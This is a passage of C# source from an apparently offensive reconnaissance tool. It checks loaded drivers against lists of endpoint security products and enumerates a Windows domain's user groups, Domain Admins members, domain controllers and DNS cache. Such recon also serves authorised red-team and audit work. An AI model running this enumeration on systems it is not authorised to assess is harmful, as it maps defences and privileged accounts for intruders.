                        if (file.Name == "TMUMS.sys" || file.Name == "hfileflt.sys" || file.Name == "TMUMH.sys" || file.Name == "AcDriver.sys" || file.Name == "SakFile.sys" || file.Name == "SakFile.sys" || file.Name == "SakMFile.sys" || file.Name == "fileflt.sys" || file.Name == "TmEsFlt.sys" || file.Name == "tmevtmgr.sys" || file.Name == "TmFileEncDmk.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Trend Micro Inc found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "epregflt.sys" || file.Name == "medlpflt.sys" || file.Name == "dsfa.sys" || file.Name == "cposfw.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Check Point Software found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "psepfilter.sys" || file.Name == "cve.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Absolute found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "brfilter.sys" || file.Name == "BrCow_x_x_x_x.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("Bromium found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "LRAgentMF.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("LogRhythm found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }

                        if (file.Name == "libwamf.sys")
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("OPSWAT Inc found!");
                            Console.ForegroundColor = ConsoleColor.White;
                        }
                    }
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] AD Group Info for user {0}:", Environment.UserName);
                Console.ForegroundColor = ConsoleColor.White;

                PrincipalContext context = new PrincipalContext(ContextType.Domain);
                UserPrincipal    usr     = UserPrincipal.FindByIdentity(context, Environment.UserName);
                PrincipalSearchResult <Principal> groups = usr.GetAuthorizationGroups();

                foreach (GroupPrincipal g in groups)
                {
                    Console.WriteLine(g.Name);
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[+] Domain Admins:");
                Console.ForegroundColor = ConsoleColor.White;
                PrincipalContext context2  = new PrincipalContext(ContextType.Domain);
                GroupPrincipal   domadmins = GroupPrincipal.FindByIdentity(context2, "domain admins");

                foreach (Principal h in domadmins.GetMembers())
                {
                    Console.WriteLine(h.SamAccountName);
                }

                Console.WriteLine("");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            try
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
                Console.WriteLine("[+] Domain Controllers for {0}:", domain);
                Console.ForegroundColor = ConsoleColor.White;

                System.DirectoryServices.ActiveDirectory.Domain dom = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();

                foreach (System.DirectoryServices.ActiveDirectory.DomainController dc in dom.DomainControllers)
                {
                    Console.WriteLine("DC Name: " + dc.Name);
                    Console.WriteLine("    [+] IP Address: " + dc.IPAddress);
                }
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            Console.WriteLine("");
            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("[+] DNS Cache Host Entries:");
            Console.ForegroundColor = ConsoleColor.White;

            DNS cacher = new DNS();

            cacher.run();
        }